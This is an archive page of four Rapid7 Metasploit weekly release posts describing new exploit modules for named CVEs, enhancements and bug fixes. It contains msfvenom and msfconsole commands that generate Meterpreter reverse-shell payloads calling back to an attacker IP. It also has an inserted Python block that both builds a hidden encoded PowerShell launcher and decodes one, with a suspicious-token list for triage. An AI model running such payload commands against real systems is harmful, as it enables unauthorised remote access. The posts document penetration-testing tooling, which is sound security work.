All posts by Erin Bleiweiss

Metasploit Weekly Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/

Spring4Shell module

Community contributor vleminator added a new module which exploits CVE-2022-22965—more commonly known as "Spring4Shell." Depending on its deployment configuration, Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.

F5 BIG-IP iControl RCE via REST Authentication Bypass module

In addition, we have a new module that targets F5 iControl and exploits CVE-2022-1388, from contributor heyder. This vulnerability allows attackers to bypass iControl’s REST authentication on affected versions and achieve unauthenticated remote code execution as root via the /mgmt/tm/util/bash endpoint.

Cisco RV340 SSL VPN RCE module

The last of the new RCE modules this week—community contributor pedrib added a Cisco RV340 SSL VPN module, which exploits CVE-2022-20699. This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.

First Class PowerShell Command Payloads

Metasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin, which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer PowerShell commands for in-memory execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new cmd/windows/powershell* payloads. The new adapter converts the native code into a PowerShell command automatically, without additional effort from the module developer.

Since these are new payload modules, they can also be generated directly using MSFVenom:

./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128

This is similar to using one of the psh- formatters with the existing -f option. However, because it’s a payload module, the additional PowerShell-specific options are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting Powershell::encode_final_payload=true.
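As an added illustration (not code from the Metasploit project), the Python below shows the base64-over-UTF-16LE encoding that PowerShell's -EncodedCommand expects, which is what Powershell::encode_final_payload applies in spirit, alongside the decode and triage step a defender uses to recover the script from a logged powershell.exe command line. The sample script, wrapper flags and indicator list are constructed for the example.

```python
import base64
import shlex

# Constructed stand-in for a script the adapter would wrap; not a real payload.
SAMPLE_SCRIPT = "Write-Host 'stage: loader'; $b = [Convert]::FromBase64String('QUJD')"

# Constructed list of strings worth a second look in a decoded command.
SUSPICIOUS_TOKENS = ("FromBase64String", "VirtualAlloc", "Invoke-Expression",
                     "IEX", "DownloadString")


def encode_command(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def build_command_line(script: str) -> str:
    """Wrap an encoded script in a typical launcher line (flags are an assumption)."""
    return f"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc {encode_command(script)}"


def _is_encoded_flag(tok: str) -> bool:
    """PowerShell accepts any unambiguous prefix of -EncodedCommand, plus the -ec alias."""
    if tok[:1] not in ("-", "/"):
        return False
    lf = tok[1:].lower()
    return lf != "" and (lf == "ec" or "encodedcommand".startswith(lf))


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    try:
        toks = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    except ValueError:
        toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if _is_encoded_flag(tok):
            blob = toks[i + 1].strip("\"'")
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None  # flag present but the argument is not a valid blob
    return None


def triage(cmdline: str) -> dict:
    """Decode an encoded command line and list which suspicious tokens it contains."""
    script = decode_encoded_command(cmdline)
    hits = [t for t in SUSPICIOUS_TOKENS if script and t.lower() in script.lower()]
    return {"encoded": script is not None, "script": script, "hits": hits}


if __name__ == "__main__":
    line = build_command_line(SAMPLE_SCRIPT)
    print(line)
    print(triage(line))
```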

New module content (4)

  • F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388 – A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
  • Cisco RV340 SSL VPN RCE from pedrib, which exploits CVE-2022-20699 – A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the root user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.
  • Spring Framework Class property RCE (Spring4Shell) by vleminator, which exploits CVE-2022-22965 – This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a war file, though it may be possible to bypass these limitations later.
  • Powershell Command Adapter from zeroSteiner – This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using PowerShell.

Enhancements and features (4)

  • #16529 from dwelch-r7 – This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:
use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'
to_handler
  • #16538 from adfoster-r7 – The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.
  • #16551 from adfoster-r7 – The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.
  • #16553 from mauvehed – This updates Metasploit’s .github/SECURITY.md file with the latest steps to follow when raising security issues with Rapid7’s open source projects.

Bugs fixed (8)

  • #16485 from jeffmcjunkin – This updates the version check for the exploit/windows/local/s4u_persistence module to allow it to run on later Windows versions.
  • #16491 from adfoster-r7 – This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.
  • #16531 from adfoster-r7 – This fixes a crash in various pihole modules when login authentication is required.
  • #16533 from cdelafuente-r7 – This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with -w 32 or -w 64 – previously these flag values were unintentionally ignored.
  • #16540 from adfoster-r7 – This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.
  • #16542 from sjanusz-r7 – This fixes a bug in msfconsole’s internal bookkeeping to ensure that closed channels are no longer tracked.
  • #16544 from adfoster-r7 – This updates post module windows/gather/ad_to_sqlite to no longer crash. The module will now additionally store the extracted information as loot.
  • #16560 from Ronni3X – This updates the nessus_connect login functionality to correctly handle the @ symbol being present in the password.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/02/18/metasploit-wrap-up-149/

Nagios XI web shell upload module

New this week is a Nagios Web Shell Upload module from Rapid7’s own Jake Baines, which exploits CVE-2021-37343. This module builds upon the existing Nagios XI scanner written by Erik Wynter. Versions of Nagios XI prior to 5.8.5 are vulnerable to a path traversal that lets an authenticated admin upload a PHP web shell, resulting in code execution as the www-data user.

Ignition for Laravel RCE module

Community contributor heyder added a module which exploits CVE-2021-3129 in Ignition for Laravel, versions prior to 2.5.2. This module allows for unauthenticated remote code execution due to insecure usage of the PHP functions file_get_contents() and file_put_contents().

New module content (3)

  • Grandstream UCM62xx IP PBX WebSocket Blind SQL Injection Credential Dump by jbaines-r7, which exploits CVE-2020-5723 – A new module has been added which exploits CVE-2020-5724, a blind SQL injection in GrandStream UCM62xx IP PBX devices prior to firmware version 1.20.22 to dump usernames and passwords from the users table as an unauthenticated attacker. Successfully gathered credentials will be stored in Metasploit’s credential database for use in further attacks.
  • Nagios XI Autodiscovery Webshell Upload by Claroty Team82 and jbaines-r7, which exploits CVE-2021-37343 – This exploits a path traversal vulnerability in Nagios XI versions below 5.8.5 to achieve authenticated code execution as the www-data user.
  • Unauthenticated remote code execution in Ignition by Heyder Andrade and ambionics, which exploits CVE-2021-3129 – This module exploits a vulnerability in Ignition before 2.5.2, as used in Laravel and other products, which allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents().

Enhancements and features

  • #16076 from bcoles – This change adds the Meterpreter session type to the post/osx/gather/hashdump module, hiding a warning when the module is run with a Meterpreter session.
  • #16117 from zeroSteiner – This makes some Log4Shell updates. It refactors the scanner to reduce duplicate code and fixes a couple of minor bugs.
  • #16161 from smashery – This PR updates the user agent strings for HTTP payloads to use the latest user agent strings for Chrome, Edge and Firefox on Windows and macOS, as well as iPad.
  • #16170 from sjanusz-r7 – This change fixes the native_arch functionality on Java and ensures the native architecture is displayed when running meterpreter > sysinfo on Java.
  • #16173 from AlanFoster – Adds additional --no-readline and --readline options to msfconsole for configuring the use of Readline support.
  • #16181 from AlanFoster – This adds a resource script for extracting the Meterpreter commands from currently open sessions.
  • #16192 from zha0gongz1 – The session notifier has been updated to support notifying about new sessions via WeChat using the ServerJang API and servers.
  • #16195 from darrenmartyn – The hp_dataprotector_cmd_exec.rb module has been updated to support x64 payloads. This fixes a bug whereby x64 payloads were not supported as the Arch value was not set, leading it to default to x86 payloads only.

Bugs fixed

  • #16174 from AlanFoster – This change fixes the mode specification on File.read required for ruby 3 on multiple modules.
  • #16175 from AlanFoster – This change fixes the loadpath command summary to display the module types in alphabetical order.
  • #16177 from AlanFoster – This change fixes the post(test/search) Meterpreter tests on OSX.
  • #16184 from adfoster-r7 – This fixes a crash when running msfconsole on a Windows host in conjunction with the sessions -u command.
  • #16194 from zeroSteiner – This fixes a crash when using Metasploit’s psexec module with the Command target.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2021/11/19/metasploit-wrap-up-139/

Azure Active Directory login scanner module

Community contributor k0pak4 added a new login scanner module for Azure Active Directory. This module exploits a vulnerable authentication endpoint in order to enumerate usernames without generating log events. The error code returned by the endpoint can be used to discover the validity of usernames in the target Azure tenant. If a tenant’s domain is known, the module can also be used to brute-force login credentials by providing a list of usernames and passwords.

Aerohive NetConfig RCE module

Also new this week, community contributor Erik Wynter added an exploit module for Aerohive NetConfig, versions 10.0r8a build-242466 and below. These versions are vulnerable to local file inclusion and log poisoning, as they rely on a version of PHP 5 that is affected by string truncation attacks. This allows users to achieve unauthenticated remote code execution as root on vulnerable systems.

2021 Metasploit community CTF

In case you missed the announcement earlier this week, the 2021 edition of the Metasploit community CTF is set to kick off two weeks from today! Registration starts Monday, November 22 for up to 750 teams, with capacity for an additional 250 teams once play starts on Friday, December 3. Many thanks to TryHackMe for sponsoring the event and providing some great prizes. Find some teammates and mark your calendars, because this year’s event should be a great challenge and a lot of fun for both beginners and CTF veterans!

New module content (4)

  • Jetty WEB-INF File Disclosure by Mayank Deshmukh, cangqingzhe, charlesk40, h00die, and lachlan roberts, which exploits CVE-2021-28164 – This adds an auxiliary module that retrieves sensitive files from Jetty versions 9.4.37.v20210219, 9.4.38.v20210224, 9.4.37-9.4.42, 10.0.1-10.0.5, and 11.0.1-11.0.5. Protected resources behind the WEB-INF path can be accessed due to servlet implementations improperly handling URIs containing certain encoded characters.
  • Microsoft Azure Active Directory Login Enumeration by Matthew Dunn – k0pak4 – This adds an auxiliary scanner module that leverages an Azure Active Directory authentication flaw to enumerate usernames without generating log events. The module also supports brute-forcing passwords against this tenant.
  • Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE by Erik Wynter and Erik de Jong, which exploits CVE-2020-16152 – This change adds a new module to exploit LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user.
  • Sitecore Experience Platform (XP) PreAuth Deserialization RCE by AssetNote and gwillcox-r7, which exploits CVE-2021-42237 – This adds an exploit for CVE-2021-42237 which is an unauthenticated RCE within the Sitecore Experience Platform. The vulnerability is due to the deserialization of untrusted data submitted by the attacker.

Enhancements and features

  • #15796 from zeroSteiner – Support for pivoted SSL server connections as used by capture modules and listeners has been added to Metasploit. The support works for both Meterpreter sessions and SSH sessions.
  • #15851 from smashery – Update several modules and core libraries so that now when sending HTTP requests that include user agents, the user agents are modernized, and are randomized at msfconsole start time. Users can also now request Rex to generate a random user agent from one of the ones in the User Agent pool should they need a random user agent for a particular module.
  • #15862 from smashery – Updates have been made to Linux Meterpreter libraries to support expanding environment variables in several different commands. This should provide users with a smoother experience when using environment variables in commands such as cd, ls, download, upload, mkdir and similar commands.
  • #15867 from h00die – The example modules have been updated to conform to current RuboCop rules and to better reflect recent changes in the Metasploit Framework coding standards, as well as to better showcase various features that may be needed when developing exploits.
  • #15878 from smashery – This fixes an issue whereby tab-completing a remote folder in Meterpreter would append a space onto the end. This change resolves that by not appending the space if we’re potentially in the middle of a tab completion journey, and adding a slash if we’ve completed a directory, providing a smoother tab completion experience for users.

Bugs fixed

  • #15875 from smashery – This fixes an issue with the reverse Bash command shell payloads where they would not work outside of the context of bash.
  • #15879 from jmartin-r7 – Updates batch scanner modules to no longer crash when unable to correctly calculate a scanner thread’s batch size.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2021/08/13/metasploit-wrap-up-125/

Print Driver PrivEsc

If you attended DEF CON last week, you may have seen this talk on print driver vulnerabilities from Metasploit community contributor Jacob Baines. In the spirit of Friday the 13th, we’re highlighting some of these "print nightmares" again, in the form of two new Metasploit modules that Jacob added.
The first is a Canon TR150 Print Driver Local Privilege Escalation module, which exploits CVE-2021-38085. The second is a Lexmark Universal Print Driver Local Privilege Escalation module, which exploits CVE-2021-35449. Both modules target Windows systems with their respective vulnerable print drivers installed, and result in privilege escalation to a SYSTEM user.

Atlassian Crowd RCE

Also new in this week’s release is an Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE module by Rapid7’s own Grant Willcox, which exploits CVE-2019-11580. This vulnerability allows an attacker to upload arbitrary plugins to vulnerable Atlassian Crowd data servers and achieve unauthenticated remote code execution. This module also includes a check method for verifying whether a target is vulnerable to this exploit. It should be noted that this vulnerability made the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of the 12 most routinely exploited vulns for 2020.

New module content (3)

  • Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE by Corben Leo, Grant Willcox, and Paul, which exploits CVE-2019-11580 – This adds an exploit for CVE-2019-11580 which is an unauthenticated RCE within the Atlassian Crowd application. The vulnerability allows for a malicious JAR file to be loaded, resulting in arbitrary Java code execution within the context of the service.
  • Canon Driver Privilege Escalation by Jacob Baines and Shelby Pace, which exploits CVE-2021-38085 – A new module has been added to exploit CVE-2021-38085, a privilege escalation issue in the Canon TR150 Print Driver. Successful exploitation results in code execution as the SYSTEM user.
  • Lexmark Driver Privilege Escalation by Grant Willcox, Jacob Baines, and Shelby Pace, which exploits CVE-2021-35449 – A new module has been added to exploit CVE-2021-35449, a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver. Successful exploitation allows local attackers to gain SYSTEM level code execution.

Enhancements and features

  • #15327 from adfoster-r7 – Fixes a regression issue in the RPC analyze command. Adds automated integration tests to ensure it doesn’t break in the future.
  • #15430 from zeroSteiner – This adds support for SSH pivoting by adding a new Command Shell session type for SSH clients. This also updates both auxiliary/scanner/ssh/ssh_login and auxiliary/scanner/ssh/ssh_login_pubkey modules to include these changes. Note that it only supports TCP client connections and only outbound payloads can be used through the SSH pivot at the moment (no reverse payloads).
  • #15493 from jmartin-r7 – Updated Metasploit’s dependency on Rails from version 5.2 to 6.1.
  • #15523 from adfoster-r7 – This enhances the console output with additional information on why a session may not be compatible with a post module, such as missing Meterpreter commands.
  • #15535 from adfoster-r7 – The psexec module has been updated to use the SMBSHARE option name instead of SHARE for better consistency across modules. Users can still use the old SHARE option if needed, however this should be considered deprecated.

Bugs fixed

  • #15524 from pingport80 – This fixes a localization-related issue in the post/linux/gather/enum_network module, caused by it searching for language-specific strings in the output to determine success.
  • #15534 from timwr – Fixes a regression issue in post/multi/manage/shell_to_meterpreter where the generated PowerShell command length was greater than the limit of 8192 characters after string obfuscation was applied.
  • #15536 from zeroSteiner – The HiveNightmare module has been updated to correctly use the ITERATIONS option instead of the NBRE_ITER option when performing the loop to call check_path(). This fixes an issue where the module would hang whilst users were running it, and ensures the loop correctly terminates after a set number of iterations.
  • #15542 from adfoster-r7 – This fixes a regression with Meterpreter’s initialize methods, which caused Meterpreter scripts to be broken.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).